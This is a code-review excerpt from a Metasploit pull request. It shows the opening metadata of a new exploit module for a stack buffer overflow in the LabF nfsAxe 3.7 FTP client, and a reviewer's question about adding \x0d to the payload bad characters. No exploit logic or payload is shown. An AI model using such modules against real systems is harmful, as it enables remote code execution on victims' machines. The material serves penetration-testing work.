modules/exploits/windows/ftp/labf_nfsaxe.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::TcpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
+      },
+      'Author'   =>
+        [
+          'Tulpa',  # Original exploit author
+          'Daniel Teixeira'   # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '42011' ],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x10",

```

Comment:
In the last FTP client exploit (#9360), I noticed that ```\x0d``` is actually a bad character that we missed. Do you think that might be the case for this one, too?

Reply:
I see. Thanks! :-)